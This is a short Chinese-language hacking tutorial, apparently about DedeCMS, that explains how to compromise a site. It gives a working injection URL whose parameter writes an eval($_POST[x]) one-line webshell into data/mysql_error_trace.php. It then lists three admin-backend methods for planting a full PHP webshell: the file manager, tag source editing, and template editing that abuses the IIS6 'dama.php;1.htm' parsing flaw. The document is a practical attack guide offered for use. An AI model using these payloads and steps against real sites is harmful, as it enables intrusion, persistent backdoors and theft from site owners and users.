1、注入漏洞
存在注入地址:在域名下輸入plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
http://localhost:802/plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
注入成功,產生了注入文件。
http://localhost:802/data/mysql_error_trace.php
一句話木馬連接上傳大馬即可!
注入漏洞詳解見
http://www.hackline.net/a/news/ldfb/2009/0830/323.html
2、后台拿webshell
第一種方法,利用文件管理直接創建php大馬```
后台--核心--附件管理--文件式管理器 新建文件,寫入大馬文件直接訪問。
如果沒有安裝文件管理器,可以查看下插件目錄有沒有此插件文件。
后台--模塊--模塊管理--文件管理器 點擊安裝,然后在創建php大馬```
如果沒有安裝插件,並刪除了插件目錄就無法使用此方法。
第二種方法:利用標簽源碼管理
后台--模板--標簽源碼管理,隨便選擇一個標簽 點編輯。文件名稱輸入:格式為。xxx.lib.php,內容輸入大馬文件即可。
第三種方法、利用模板修改。
此方法利用IIS解析漏洞,前提網站必須在IIS6.0運行。
后台--模板--默認模板管理,隨便選擇一個模板 點編輯。文件名輸入dama.php;1.htm,內容輸入大馬文件即可。
注意,此情況輸入密碼可能導致跳轉顯示無法找到網頁,你可以輸入密碼后,再訪問dama.php;1.htm這樣就可以了。因為解析時截斷了文件名變成dama.php了。